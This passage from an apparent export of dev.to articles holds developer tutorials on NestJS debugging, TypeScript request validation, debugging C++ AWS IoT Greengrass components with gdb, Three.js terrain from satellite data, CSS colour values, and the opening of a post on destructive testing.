## Step 2: Setup your dev tools
1. How to debug NestJS in VSCode?
> .vscode/launch.json
```json
{
"configurations": [
{
"name": "Debug API",
"type": "node",
"program": "${workspaceFolder}/src/application/api/main.ts",
"runtimeArgs": [
"-r",
"ts-node/register",
"-r",
"tsconfig-paths/register"
],
"console": "integratedTerminal",
"request": "launch",
"skipFiles": ["<node_internals>/**"],
"outFiles": ["${workspaceFolder}/**/*.js", "!**/node_modules/**"]
},
{
"name": "Debug remote api",
"type": "node",
"request": "attach",
"remoteRoot": "/app",
"localRoot": "${workspaceFolder}",
"port": 9229,
"restart": true,
"address": "0.0.0.0",
"skipFiles": ["<node_internals>/**"]
}
]
}
```
> Debug main app (file storage api)
F5 -> Select Debug API
Make sure your program path is your api's main file
> Eg: "program": "${workspaceFolder}/src/application/api/main.ts",
> Debug remote
Example: Start app in debug mode - debugger port 9229
F5 -> Select Debug remote API
```bash
npm run start:debug
```
## Step 3: Design source code structure
**Overview layers**

1. solutions
- deployment -> deployment scripts, dockerfiles, k8s, ...
2. src
- src/application -> applications: file-storage-api, web, queues, ...
- src/domain -> Tables mapping
- src/business -> Business logic
- src/share -> Share/Common projects
- src/persistence -> TypeORM Core
- src/config -> config: log,environment, configuration
3. test -> test configuration
**domain layer**

**application layer**

**business layer**

**persistence layer**

**config layer**

This is the high level of the design.
You can visit [Build Restful Api With Nestjs the Right Way](https://nextjsvietnam.com/post/build-restful-api-with-nestjs-the-right-way/) for more detail examples.
Have a good day!
Made with love by [Nextjs VietNam](https://nextjsvietnam.com/) | nextjsvietnam |
1,240,020 | 28-Nodejs Course 2023: Validation Part VI: Custom Validation | We have made such an amazing progress in validation, but there is still more to be done. ... | 20,274 | 2022-11-02T16:18:07 | https://dev.to/hassanzohdy/28-nodejs-course-2023-validation-part-vi-custom-validation-31g1 | node, typescript, mongodb, fastify | ---
title: 28-Nodejs Course 2023: Validation Part VI: Custom Validation
published: true
description:
series: Nodejs Course 2023
tags: nodejs, typescript, mongodb, fastify
#cover_image:
# Use a ratio of 100:42 for best results.
---
We have made such an amazing progress in validation, but there is still more to be done.
## Configurations Types
We have created configurations list successfully, but let's give it a more fancy touch, let's define a type for it.
Create `types.ts` file in `src/core/validator` directory.
```ts
// src/core/validator/types.ts
export type ValidationConfigurations = {
/**
* Whether to stop validator after first failed rule
*
* @default true
*/
stopOnFirstFailure?: boolean;
}
```
We added only one property for now to see how i'm writing it.
We first write documentation for it, if we set a default value then we write it in the documentation, and then we define the type.
Now let's add the rest of the configurations.
```ts
// src/core/validator/types.ts
import Rule from "./rules/rule";
export type ValidationConfigurations = {
/**
* Whether to stop validator after first failed rule
*
* @default true
*/
stopOnFirstFailure?: boolean;
/**
* Return Error Strategy
* If strategy is `first` then it will return a single error in string from the rule errors list
* If strategy is `all` then it will return an array of string that contains all errors.
*
* The `all` strategy will be affected as well with `stopOnFirstFailure` if it is set to `true`
* and strategy is set to `all` it will always return an array with one value
*
* @default first
*/
returnErrorStrategy?: "first" | "all";
/**
* Response status code
*
* @default 400
*/
responseStatus?: number;
/**
* Validation keys
*/
keys?: {
/**
* Response error key that will wrap the entire errors
*
* @default errors
*/
response?: string;
/**
* Input key name
*
* @default input
*/
inputKey?: string;
/**
* Single Error key (when strategy is set to first)
*
* @default error
*/
inputError?: string;
/**
* Multiple Errors key (when strategy is set to all)
*
* @default errors
*/
inputErrors?: string;
};
/**
* Rules list that will be used in the validation process
*/
rules?: Record<string, typeof Rule>;
};
```
All types are pretty much self explained, except the `rules` one, we used the `Record` type which means we're telling Typescript the `rules` will be an object, its key will be `string` and its value will be typeof `Rule` class.
Now let's export it in the validator index then import it in the `validator.ts` configuration file.
```ts
// src/core/validator/index.ts
export { default as RequiredRule } from "./rules/required";
export { default as Rule } from "./rules/rule";
export { default as StringRule } from "./rules/string";
export * from "./types";
export { default as Validator } from "./validator";
```
```ts
// src/config/validation.ts
import {
RequiredRule,
StringRule,
ValidationConfigurations,
} from "core/validator";
const validationConfigurations: ValidationConfigurations = {
stopOnFirstFailure: true,
returnErrorStrategy: "first",
responseStatus: 400,
rules: {
[RequiredRule.ruleName]: RequiredRule,
[StringRule.ruleName]: StringRule,
},
keys: {
response: "messages",
inputKey: "key",
inputError: "error",
inputErrors: "errors",
},
};
export default validationConfigurations;
```
The amazing thing about typescript, is that now you can use the auto complete feature in your vscode.
Try to remove all configurations and inside the object press `ctrl + space` and you will see all the configurations that you can use.
## Missing Rule Handler
As we're going big, we need to make sure that our code is working as expected, what if we tried to add a rule that does not exist in the `rules` list?
In that case the application will definitely crash, so let's add a handler for that.
```ts
// src/core/validator/rules-list.ts
import chalk from "chalk";
/**
* Validate the rules
*/
public async validate() {
for (const ruleName of this.rules) {
const RuleClass = config.get(`validation.rules.${ruleName}`);
if (!RuleClass) {
throw new Error(
chalk.bold(
`Missing Rule: ${chalk.redBright(
ruleName,
)} rule is not listed in ${chalk.cyan(
"validation.rules",
)} configurations,`,
),
);
}
const rule = new RuleClass(this.input, this.value);
await rule.validate();
if (rule.fails()) {
this.errorsList.push(rule.error());
if (config.get("validation.stopOnFirstFailure", true)) {
break;
}
}
}
}
```
We added a check here to see if the rule exists in the `rules` list, if not then we throw an error.
But we need to catch that error to be displayed as you won't see any error in the console.
Open the request class to wrap the validator in a try catch block.
```ts
// src/core/http/request.ts
/**
* Execute the request
*/
public async execute() {
if (this.handler.validation) {
const validator = new Validator(this, this.handler.validation.rules);
try {
await validator.scan(); // start scanning the rules
} catch (error) {
// this is needed to catch the error thrown by the missing rule handler
console.log(error);
}
if (validator.fails()) {
const responseErrorsKey = config.get(
"validation.keys.response",
"errors",
);
const responseStatus = config.get("validation.responseStatus", 400);
return this.response.status(responseStatus).send({
[responseErrorsKey]: validator.errors(),
});
}
}
return await this.handler(this, this.response);
}
```
Now go to `create-user` and add `email` rule that does not exist in the `validation.rules` list.
> Mark `stopOnFirstFailure` as `false` in the `validation.ts` file to see the difference.
You should now see something like this in your terminal:

## Custom Validation
So we're so far now good with validation, but sometimes rules are not enough, we might need to do some custom validations on the requests besides the rules.
That's where we'll introduce a new `validate` method in the handler `validation` object.
## Validate Method
The handler (controller) has a `validation` property, which contains the `rules` property to validate inputs.
We will also add the ability to add a `validate` method to the `validation` object so we can do any custom validation.
## How it works
The `validate` method will receive the request and the response as parameters, and it will be executed after the rules validation.
If the `validate` method returns a value, this will be returned, otherwise the handler will be executed.
Also we'll make it `async` function so we can perform any async operation inside it.
Let's jump into the code.
```ts
// src/core/http/request.ts
/**
* Execute the request
*/
public async execute() {
if (this.handler.validation) {
// rules validation
if (this.handler.validation.rules) {
const validator = new Validator(this, this.handler.validation.rules);
try {
await validator.scan(); // start scanning the rules
} catch (error) {
console.log(error);
}
if (validator.fails()) {
const responseErrorsKey = config.get(
"validation.keys.response",
"errors",
);
const responseStatus = config.get("validation.responseStatus", 400);
return this.response.status(responseStatus).send({
[responseErrorsKey]: validator.errors(),
});
}
}
// custom validation
if (this.handler.validation.validate) {
const result = await this.handler.validation.validate(
this,
this.response,
);
if (result) {
return result;
}
}
}
return await this.handler(this, this.response);
}
```
We wrapped the `rules` validation with a new if statement, to see if the request has `rules` property.
If the rules property exists, then execute and validate it first, if failed, then stop executing the handler and the custom validator as well.
Now let's give it a try, open `create-user` handler and add the `validate` method.
```ts
// src/app/users/controllers/create-user.ts
import { Request } from "core/http/request";
export default async function createUser(request: Request) {
const { name, email } = request.body;
return {
name,
};
}
createUser.validation = {
// rules: {
// name: ["required", "string"],
// email: ["required", "string"],
// },
validate: async () => {
return {
error: "Bad Request",
};
},
};
```
We commented the rules only for testing purposes, and added a `validate` method that returns an object.
If the validate returns any value, then it will return that value, otherwise it will execute the handler.
## Conclusion
We've reached the end of this article, we've added the configurations types, we also wrapped the rules validation in a try catch block to catch any errors thrown by the rules.
Also we added a custom validation method to the handler, so we can do any custom validation on the request.
## 🎨 Project Repository
You can find the latest updates of this project on [Github](https://github.com/hassanzohdy/nodejs-2023)
## 😍 Join our community
Join our community on [Discord](https://discord.gg/pb2vmdfhGf) to get help and support (Node Js 2023 Channel).
## 🎞️ Video Course (Arabic Voice)
If you want to learn this course in video format, you can find it on [Youtube](https://www.youtube.com/playlist?list=PLGO8ntvxgiZMJc7RN2lIq9WmMOlWZGzmz), the course is in Arabic language.
## 💰 Bonus Content 💰
You may have a look at these articles, it will definitely boost your knowledge and productivity.
General Topics
- [Event Driven Architecture: A Practical Guide in Javascript](https://dev.to/hassanzohdy/event-driven-architecture-the-best-paradigm-that-i-love-to-work-with-in-javascript-and-node-js-1gnk)
- [Best Practices For Case Styles: Camel, Pascal, Snake, and Kebab Case In Node And Javascript](https://dev.to/hassanzohdy/best-practices-for-case-styles-camel-pascal-snake-and-kebab-case-in-node-and-javascript-55oi)
- [After 6 years of practicing MongoDB, Here are my thoughts on MongoDB vs MySQL
](https://dev.to/hassanzohdy/after-6-years-of-practicing-mongodb-here-are-my-thoughts-on-mongodb-vs-mysql-574b)
Packages & Libraries
- [Collections: Your ultimate Javascript Arrays Manager](https://dev.to/hassanzohdy/collections-your-ultimate-javascript-array-handler-3o15)
- [Supportive Is: an elegant utility to check types of values in JavaScript](https://dev.to/hassanzohdy/supportive-is-an-elegant-utility-to-check-types-of-values-in-javascript-1b3e)
- [Localization: An agnostic i18n package to manage localization in your project](https://dev.to/hassanzohdy/mongez-localization-the-simplest-way-to-translate-your-website-regardless-your-favorite-framework-4gi3)
React Js Packages
- [useFetcher: easiest way to fetch data in React Js](https://dev.to/hassanzohdy/usefetcher-the-easiest-way-to-fetch-data-in-react-45o9)
Courses (Articles)
- [React Js: Let"s Create File Manager With React Js and Node Js](https://dev.to/hassanzohdy/lets-create-a-file-manager-from-scratch-with-react-and-typescript-chapter-i-a-good-way-to-expand-your-experience-5g4k)
| hassanzohdy |
1,240,029 | Debugging C/C++ AWS IoT Greengrass Components using VSCode | In most scenarios, simply logging the output of the application is enough to understand what is... | 0 | 2022-11-02T08:49:53 | https://dev.to/iotbuilders/debugging-cc-greengrass-components-using-vscode-1nbh | iot, greengrass |
In most scenarios, simply logging the output of the application is enough to understand what is happening and perform debugging in case there is an application misbehaviour. However sometimes in order to catch some stubborn bugs stepping through the code while application is executing might be the most efficient way to do it. AWS IoT Greengrass provides a CLI tool that allows local components to be deployed and tested by also accessing the application logs, but in the scenario where we want to step through the code and understand the stack and other parts of the memory of a C/C++ component than we would need some additional configuration, which we will cover in this post.
## Prerequisites
For this setup I will be using an EC2 instance running Ubuntu 22.04 and having tools like `gdb`, `gdbserver`, `cmake` and `build-essential` installed as well as having my VSCode configured for [Remote Development using SSH](https://code.visualstudio.com/docs/remote/ssh). For installing AWS IoT Greengrass, I’ll be using an installation instructions provided by a [Getting Started guide](https://docs.aws.amazon.com/greengrass/v2/developerguide/getting-started.html), but any variation of this that provides the tools mentioned above, as well as AWS IoT Greengrass and Greengrass CLI installed and running, should work.
>Note that for installing Greengrass CLI together with Greengrass, supply the installer with the parameter `--deploy-dev-tools true ` which will add the Greengrass CLI component.
## Building and Running the C++ Application
Before we can build our C++ we need to make sure the we have the AWS IoT Device SDK for C++ v2 build and available to link against as it provides the Greengrass IPC library.
```
# Create a workspace directory to hold all the SDK files
mkdir sdk-workspace
cd sdk-workspace
# Clone the repository
git clone --recursive https://github.com/aws/aws-iot-device-sdk-cpp-v2.git
# Ensure all submodules are properly updated
cd aws-iot-device-sdk-cpp-v2
git submodule update --init --recursive
cd ..
# Make a build directory for the SDK. Can use any name.
# If working with multiple SDKs, using a SDK-specific name is helpful.
mkdir aws-iot-device-sdk-cpp-v2-build
cd aws-iot-device-sdk-cpp-v2-build
# Generate the SDK build files.
# -DCMAKE_INSTALL_PREFIX needs to be the absolute/full path to the directory.
# (Example: "/home/ubuntu/sdk-workspace/aws-iot-device-sdk-cpp-v2-build).
cmake -DCMAKE_INSTALL_PREFIX="/home/ubuntu/sdk-workspace/aws-iot-device-sdk-cpp-v2-build" ../aws-iot-device-sdk-cpp-v2
# Build and install the library. Once installed, you can develop with the SDK and run the samples
# -config can be "Release", "RelWithDebInfo", or "Debug"
cmake --build . --target install --config "Debug"
```
If everything builds successfully we can now go back and create our application directory and a C++ example:
```
cd ../../
mkdir hello-world
cd hello-world
```
In here let’s create a simple `CMakeLists.txt` file:
```
cmake_minimum_required(VERSION 3.1)
project (hello-world)
file(GLOB MAIN_SRC
"*.h"
"*.cpp"
)
add_executable(${PROJECT_NAME} ${MAIN_SRC})
set_target_properties(${PROJECT_NAME} PROPERTIES
LINKER_LANGUAGE CXX
CXX_STANDARD 11)
find_package(aws-crt-cpp PATHS ~/sdk-workspace/aws-iot-device-sdk-cpp-v2-build)
find_package(EventstreamRpc-cpp PATHS ~/sdk-workspace/aws-iot-device-sdk-cpp-v2-build)
find_package(GreengrassIpc-cpp PATHS ~/sdk-workspace/aws-iot-device-sdk-cpp-v2-build)
target_link_libraries(${PROJECT_NAME} AWS::GreengrassIpc-cpp)
```
Finally let’s create our c++ example file which will subscribe to a specific MQTT topic (test/topic/cpp) and print out received messages `main.cpp`:
```
#include <iostream>
#include <thread>
#include <aws/crt/Api.h>
#include <aws/greengrass/GreengrassCoreIpcClient.h>
using namespace Aws::Crt;
using namespace Aws::Greengrass;
class IoTCoreResponseHandler : public SubscribeToIoTCoreStreamHandler {
public:
virtual ~IoTCoreResponseHandler() {}
private:
void OnStreamEvent(IoTCoreMessage *response) override {
auto message = response->GetMessage();
if (message.has_value() && message.value().GetPayload().has_value()) {
auto messageBytes = message.value().GetPayload().value();
std::string messageString(messageBytes.begin(), messageBytes.end());
std::string messageTopic = message.value().GetTopicName().value().c_str();
std::cout << "Received new message on topic: " << messageTopic << std::endl;
std::cout << "Message: " << messageString << std::endl;
}
}
bool OnStreamError(OperationError *error) override {
std::cout << "Received an operation error: ";
if (error->GetMessage().has_value()) {
std::cout << error->GetMessage().value();
}
std::cout << std::endl;
return false; // Return true to close stream, false to keep stream open.
}
void OnStreamClosed() override {
std::cout << "Subscribe to IoT Core stream closed." << std::endl;
}
};
class IpcClientLifecycleHandler : public ConnectionLifecycleHandler {
void OnConnectCallback() override {
std::cout << "OnConnectCallback" << std::endl;
}
void OnDisconnectCallback(RpcError error) override {
std::cout << "OnDisconnectCallback: " << error.StatusToString() << std::endl;
exit(-1);
}
bool OnErrorCallback(RpcError error) override {
std::cout << "OnErrorCallback: " << error.StatusToString() << std::endl;
return true;
}
};
int main() {
String topic("test/topic/cpp");
QOS qos = QOS_AT_LEAST_ONCE;
int timeout = 10;
ApiHandle apiHandle(g_allocator);
Io::EventLoopGroup eventLoopGroup(1);
Io::DefaultHostResolver socketResolver(eventLoopGroup, 64, 30);
Io::ClientBootstrap bootstrap(eventLoopGroup, socketResolver);
IpcClientLifecycleHandler ipcLifecycleHandler;
GreengrassCoreIpcClient ipcClient(bootstrap);
auto connectionStatus = ipcClient.Connect(ipcLifecycleHandler).get();
if (!connectionStatus) {
std::cerr << "Failed to establish IPC connection: " << connectionStatus.StatusToString() << std::endl;
exit(-1);
}
SubscribeToIoTCoreRequest request;
request.SetTopicName(topic);
request.SetQos(qos);
auto streamHandler = MakeShared<IoTCoreResponseHandler>(DefaultAllocator());
auto operation = ipcClient.NewSubscribeToIoTCore(streamHandler);
auto activate = operation->Activate(request, nullptr);
activate.wait();
auto responseFuture = operation->GetResult();
if (responseFuture.wait_for(std::chrono::seconds(timeout)) == std::future_status::timeout) {
std::cerr << "Operation timed out while waiting for response from Greengrass Core." << std::endl;
exit(-1);
}
auto response = responseFuture.get();
if (response) {
std::cout << "Successfully subscribed to topic: " << topic << std::endl;
} else {
// An error occurred.
std::cout << "Failed to subscribe to topic: " << topic << std::endl;
auto errorType = response.GetResultType();
if (errorType == OPERATION_ERROR) {
auto *error = response.GetOperationError();
std::cout << "Operation error: " << error->GetMessage().value() << std::endl;
} else {
std::cout << "RPC error: " << response.GetRpcError() << std::endl;
}
exit(-1);
}
// Keep the main thread alive, or the process will exit.
while (true) {
std::this_thread::sleep_for(std::chrono::seconds(10));
}
operation->Close();
return 0;
}
```
At this point we should be able to build the application:
```
mkdir build
cd build
cmake -DCMAKE_PREFIX_PATH="/home/ubuntu/sdk-workspace/aws-iot-device-sdk-cpp-v2-build" -DCMAKE_BUILD_TYPE="Debug" ..
cmake --build . --config "Debug"
```
Since this can work only in the context of Greengrass we need to prepare the component yaml file as well as the artifact:
```
cd ..
mkdir -p gg/artifacts/com.example.HelloWorld/1.0.0
mkdir -p gg/recipes
touch gg/recipes/com.example.HelloWorld-1.0.0.yaml
```
Where the content of the `com.example.HelloWorld-1.0.0.yaml` would be:
```
RecipeFormatVersion: '2020-01-25'
ComponentName: com.example.HelloWorld
ComponentVersion: 1.0.0
ComponentDescription: My C++ component.
ComponentConfiguration:
DefaultConfiguration:
accessControl:
aws.greengrass.ipc.mqttproxy:
com.example.HelloWorld:mqttproxy:1:
policyDescription: Allows access to subscribe to a topics.
operations:
- aws.greengrass#SubscribeToIoTCore
resources:
- "test/topic/cpp"
Manifests:
- Platform:
os: linux
Lifecycle:
Run: "{artifacts:path}/hello-world"
```
Now we can copy the `hello-world` binary to artifacts directory and deploy the component to Greengrass:
```
cp build/hello-world gg/artifacts/com.example.HelloWorld/1.0.0/
sudo /greengrass/v2/bin/greengrass-cli deployment create \
--recipeDir gg/recipes \
--artifactDir gg/artifacts \
--merge "com.example.HelloWorld=1.0.0"
```
After this if look at the logs, we should see:
```
sudo bash -c "cat /greengrass/v2/logs/com.example.HelloWorld.log"
...
com.example.HelloWorld: stdout. Successfully subscribed to topic: test/topic/cpp. {scriptName=services.com.example.HelloWorld.lifecycle.Run, serviceName=com.example.HelloWorld, currentState=RUNNING}
```
Once we verify that this is working properly, we can jump to the part where we actually do a step through debugging.
## Debugging using GDB and VSCode
First let’s set up our `.vscode/launch.json` to use the `gdbserver`
```
{
"version": "0.2.0",
"configurations": [
{
"name": "HelloWorld GG Component",
"type": "cppdbg",
"request": "launch",
"program": "${workspaceFolder}/hello-world/gg/artifacts/com.example.HelloWorld/1.0.0/hello-world",
"miDebuggerServerAddress": "localhost:9091",
"args": [],
"stopAtEntry": true,
"cwd": "${workspaceRoot}",
"environment": [],
"externalConsole": false,
"serverStarted": "Listening on port",
"filterStderr": true,
"setupCommands": [
{
"description": "Enable pretty-printing for gdb",
"text": "enable-pretty-printing",
"ignoreFailures": true,
}
],
"MIMode": "gdb",
}
]
}
```
While this is a typical configuration two things we need to make sure are set right.
1. `program` is pointing to where the actual artifact is being installed by the Greengrass CLI,
2. `miDebuggerServerAddress` is set to right host and port. In this scenario since we are doing this locally we will be using the `localhost` and port of choice is `9091` which we need to match when modifying the Greengrass component recipe.
Next we will instruct Greengrass to start the `gdbserver` when starting the component, which will allow us to use `gdb` for remote debugging.
```
RecipeFormatVersion: '2020-01-25'
ComponentName: com.example.HelloWorld
ComponentVersion: 1.0.0
ComponentDescription: My C++ component.
ComponentConfiguration:
DefaultConfiguration:
accessControl:
aws.greengrass.ipc.mqttproxy:
com.example.HelloWorld:mqttproxy:1:
policyDescription: Allows access to subscribe to a topics.
operations:
- aws.greengrass#SubscribeToIoTCore
resources:
- "test/topic/cpp"
Manifests:
- Platform:
os: linux
Lifecycle:
Run: "gdbserver :9091 {artifacts:path}/hello-world"
```
Here the only difference is the `Run` command which we prefixed with `gdbserver :9091`. After this is done we can redeploy the component:
```
sudo /greengrass/v2/bin/greengrass-cli deployment create \
--recipeDir gg/recipes \
--artifactDir gg/artifacts \
--merge "com.example.HelloWorld=1.0.0"
```
After which we should see the following in the component logs:
```
sudo bash -c "cat /greengrass/v2/logs/com.example.HelloWorld.log"
com.example.HelloWorld: stderr. Listening on port 9091. {scriptName=services.com.example.HelloWorld.lifecycle.Run, serviceName=com.example.HelloWorld, currentState=RUNNING}
```
At this point, we can just create a breakpoint and start the debugging session:

We can then put a break point at line 19, which we will let us stop the application upon a retrieval of a message from the AWS IoT Core.
In order to test this we can go to AWS console → AWS IoT Core → MQTT test client → Publish to a topic and publish a message to the `test/topic/cpp` like the example bellow.

We will be able to catch this with the breakpoint and step through if necessary.

Additionally after the message got received and processed we will see it in the component log as well.
## Conclusion
This setup allows us to use `gdbserver` / `gdb` and VSCode to visualise and inspect what is happening in our GGv2 components. We can go further and even debug multiple components at the same time, where the only thing we need to change would be the `gdbserver` ports on which those applications are running and modify it in the recipe respectively.
If you find this interesting or have suggestions for future topics feel free to reach out here or @nenadilc84 on [Twitter](https://twitter.com/nenadilic84) or [LinkedIn](https://www.linkedin.com/in/nenadilic84/).
> There is also a [video](https://youtu.be/qMNZJ0CHZ9U) version of this blog
| nenadilic84 |
1,240,386 | Visualizing a mountain using Three.js, Landsat and SRTM | Originally posted on Medium on Mar 11, 2019... | 0 | 2022-11-15T19:41:10 | https://dev.to/orabazu/visualizing-a-mountain-using-threejs-landsat-and-srtm-50kp | threejs, gis, 3d, webdev |
Originally posted on Medium on Mar 11, 2019
https://zubazor.medium.com/visualizing-a-mountain-using-three-js-landsat-and-srtm-26275c920e34
TL;DR
-----
Using freely available satellite data and Javascript you can visualize a topography on earth. Link to source [code](https://github.com/zhunor/threejs-dem-visualizer) and [demo](https://zhunor.github.io/threejs-dem-visualizer/). If you think it’s going to be fun let’s continue.
<img src="https://media.giphy.com/media/r07K4fvHDD8Z2/giphy.gif" style="width: 100%"/>
Mount What?
-----------
A few weeks back, I decided to spend some time with Three.js in my leisure. I decided to visualize the 3D model of Turkey’s highest mountain: Mount Ağrı, only using freely available satellite data and Javascript. Like 15th century romantic William Blake once said; “Great things are done when men and mountains meet”. So, Willy, it is gonna be hilarious baby.
Bootstrapping with ES6 and Webpack
----------------------------------
There are plenty of good examples in Github but I’ll go forward with the [https://github.com/jackdbd/threejs-es6-webpack-starter](https://github.com/jackdbd/threejs-es6-webpack-starter) because it has all of the features I need and more and also easy to understand.
DATA
----
Mount Ağrı
The data I am going to use is freely available and provided by the [USGS](https://twitter.com/usgs). Using earth explorer I downloaded DEM(Digital Elevation Model) and satellite image of Ağrı Mountain which is a passive volcano and also the highest mountain in Turkey.
I downloaded a few images using USGS application then tried to find an image with cloud coverage of less than 10%

Downloading image from [https://earthexplorer.usgs.gov/](https://earthexplorer.usgs.gov/)
The Good, The Bad and The Landsat 🛰️
-------------------------------------
If you are not familiar with remote sensing and image processing you might not hear about the Landsat but, is a continuous satellite mission controlled by USGS and provides scientific satellite imagery for researchers with approx. 30m2 resolution for many years. One pixel of the image covers an area of 30m2 where the satellite’s camera is perpendicular to the earth. Nowadays some satellites have a resolution less than a meter but generally, they are not freely available. So, Landsat is not so good or bad, but it is enough for us, we are going to use this old loyal fella for our textures.
[https://earthexplorer.usgs.gov/](https://earthexplorer.usgs.gov/) is the source for downloading free satellite imagery. The images should have a cloud coverage of less than 10% and it should be added to the criteria. It was hard to find a good one since the mountain is so high that it is cloudy every time. After finding a suitable image I realized that Landsat covers a huge area and I needed to crop my area of interest. After cropping this is going to be the texture of the model. But more importantly, I need an elevation model to visualize the mountain.
SRTM — I don’t give a DEM 🗻
----------------------------
Yeah, actually it gives a DEM. DEM stands for Digital Elevation Model and it is raster based elevation data. SRTM which stands for “Shuttle Radar Topography Mission” is operated by NASA. ([https://www2.jpl.nasa.gov/srtm/](https://www2.jpl.nasa.gov/srtm/)) The SRTM offers a DEM with 30m resolution. Let’s recall; it means one pixel covers the approximately 30m area and the average elevation of that area as the pixel value. This data is extremely valuable for generating our mountain model in three.js
Pre Processing
--------------
I used QGIS one of my favorite products for GIS. I cut and mask the DEM and related satellite image using QGIS raster tools and copy them to the working directory.

Clipping image and DEM in QGISLooks kind of scary, digital elevation model over satellite image.

Looks like the Mouth Doom but this is how the elevation model looks like in QGIS with default color palette. I clipped two different sizes concerning performance, you can find both at the repo. I use the small one in the demo to see results fast.
Three.js
--------
Three.js is an excellent library for using WebGL easily. It might seem complicated at first glance, we will slice it into pieces to understand better.
Lights, Camera, Action
----------------------
In order to start three.js in beginner level this tutorial is very helpful. [https://aerotwist.com/tutorials/getting-started-with-three-js/](https://aerotwist.com/tutorials/getting-started-with-three-js/)
In Three.js world we need some basic setup. 4 basic components
1. A scene
2. A renderer
3. A camera
4. An object or two (with materials)
A note about materials
----------------------
I don’t care about materials in this example because the satellite image is already enlightened by the sun itself when the image is acquired. Therefore we have natural cloud shadows according to sun angle. So, I don’t mind which angle the light is coming from also. If you wonder you can dig the metadata file of Landsat image to find out in which sun angle it has when the image is acquired. Then you can simulate the same light with shaders etc. If you want real reflections you can consider using some of the shapes above.
Materials and reflections
Let’s start
-----------
We’ll start with adding a scene, then we’ll set renderer, camera, controls, and light. Adding light is crucial otherwise you cannot see anything on the scene.
Shaping The Mountain
--------------------
The geometry of our object is not modeled in Blender, Maya, or something similar. These kinds of models can be imported to three.js easily. But I am going to use DEM file to generate a model directly in js with the help of “geotiff” library.
Reading Image
-------------
Inside setupTerrainModel after adding clipped images to the project we use geotiff library to read DEM file and add a new PlaneGeometry object passing size of the image. Ok let’s generate the big boy.
<img src="https://media.giphy.com/media/3o8doT5DaMjfH3paHC/giphy.gif" style="width: 100%"/>
Then read pixel values that each pixel corresponding to an elevation value. I just heuristically divide it to “20” to make it look nice and multiplied it with -1 otherwise model will be upside down because of the z-coordinate direction of three.js, I’ll explain it later. Using console.time let us see the performance.
From now on our model is ready to pop up in the browser but without a satellite image, it is only a 3D model and going to looks like the one above.

3D mesh of Mount Ağrı in three.js
Texture Fitting
---------------
After generating the model, we are going to use an RGB satellite image which is also clipped with QGIS earlier.
We are loading the satellite image and keep in a variable called “material” to use with Three.MESH just after. And don’t forget to rotate the object because three.js has start with the right-hand coordinate system which means, by default Z-axis is not towards upwards but you. For a detailed explanation: [https://tweedegolf.nl/blog/5/threejs-rotations](https://tweedegolf.nl/blog/5/threejs-rotations)
You can either rotate the x-axis or rotate the camera at the beginning by `camera.up.set(0,0,1)` Rotating x-axis and putting out mountain just above and moving down a little bit in y-axis let’s run and swish. It is ready.
Demo & Source Code
------------------

There are two versions of DEM model (one is very large) you can test it in your local environment. I’ve used the small version for the demo. [https://zhunor.github.io/threejs-dem-visualizer/](https://zhunor.github.io/threejs-dem-visualizer/) [https://github.com/zhunor/threejs-dem-visualizer](https://github.com/zhunor/threejs-dem-visualizer)
Credits & Gains
---------------
Well, it is hard to find a nice cloudless image first of all. Secondly generating a 3D model with all detail is extremely costly. Maybe the DEM should be downscaled to a reasonable resolution if someone really willing to do it in client-side.
Tutorials of [https://github.com/jonathanlurie/ThreejsDEM](https://github.com/jonathanlurie/ThreejsDEM) and [http://blog.mastermaps.com/2013/10/terrain-building-with-threejs.html](http://blog.mastermaps.com/2013/10/terrain-building-with-threejs.html) was extremely helpful. Thank you guys.
| orabazu |
319,475 | CSS: Color Values | Colour is an integral part of designing a website. Proper colour usage makes a user's experience grow... | 5,765 | 2020-04-25T20:43:27 | https://dev.to/koralarts/css-color-values-48pl | tutorial, beginners, css, webdev | Colour is an integral part of designing a website. Proper colour usage makes a user's experience grow!
## Named colours
CSS has provided us with named colours. There are plenty of these and they can be used by simply using their names.
```css
div {
color: red;
background-color: violet;
border-color: black;
}
```
Here's a list of them: [CSS Named Colours](http://www.colors.commutercreative.com/grid/)
# Hex Values
Hex values are probably the most common colour format you've seen. The hex value starts off with a hash symbol (`#`) followed by 6 characters each ranging from `0` to `F`. Each pair corresponds to the intensity of red, green, or blue.

```css
div {
color: #FF0000; /* Red */
background-color: #FF00FF; /* Violet */
border-color: #000000; /* Black */
}
```
# `rgb`
The RGB value is similar to hex values. Where you specify the intensity of the red, green, and blue to create a colour. The main difference, aside from structure, is it goes from `0` to `255`.

```css
div {
color: rgb(255, 0, 0); /* Red */
background-color: rgb(255, 0, 255); /* Violet */
border-color: rgb(0, 0, 0); /* Black */
}
```
# `rgba`
RGBA is exactly the same as RGB but you can now specify the opacity of the colour where `0` is transparent and `1` is fully opaque.

```css
div {
color: rgba(255, 0, 0, 1); /* Red fully opaque */
background-color: rgba(255, 0, 255, 0.5); /* Violet 50% transparent */
border-color: rgba(0, 0, 0, 0); /* Black fully transparent */
}
```
# `hsl`
HSL stands for hue, saturation and lightness. This is typically the least popular way to add colour as it's difficult to understand.
**Hue**[`0-360`]: The angle of where your target colour is in a colour wheel.
**Saturation**[`0%-100%`]: The amount of saturation
**Lightness**[`0%-100%`]: The amount of brightness

```css
div {
color: hsl(300, 100%, 50%); /* Red */
background-color: hsl(354, 100%, 50%); /* Violet */
border-color: hsl(0, 0%, 0%); /* Black */
}
```
# `hsla`
HSLA now adds opacity to the regular HSL where `0` is fully transparent and `1` is fully opaque.

```css
div {
color: hsla(300, 100%, 50%, 1); /* Red fully opaque */
background-color: hsla(354, 100%, 50%, 0.5); /* Violet 50% transparent */
border-color: hsl(0, 0%, 0%, 0); /* Black fully transparent */
}
``` | koralarts |
1,240,452 | Leveraging Destructive and Non-destructive Testing in Application Development | Software testing is a crucial phase of a software development life cycle that helps evaluate whether... | 0 | 2022-11-11T05:05:55 | https://dev.to/sudip_sg/leveraging-destructive-and-non-destructive-testing-in-application-development-5ene | Software testing is a crucial phase of a software development life cycle that helps evaluate whether the application meets the expected requirements. A common approach is examining the software’s behavior and artifacts through component verification and validation. As an interdisciplinary application development field, testing relies on manual and automated tools to evaluate and document the risks associated with software implementation.
While there are various approaches to product-based testing, two such techniques include **destructive** and **non-destructive testing,** which follow contrarian methods to test for flaws and vulnerabilities. Destructive testing causes a component of the application to fail uncontrollably, allowing security experts to gauge the software’s robustness and identify the points of failure. The non-destructive testing technique, also known as **positive** or **happy path testing,** involves engaging with the application per the intended workflow and producing the desired output to ensure the software works as expected.
In this article, we discuss how destructive and non-destructive testing approaches work in application development and how they differ from each other.
## What is Destructive Testing in Application Development?
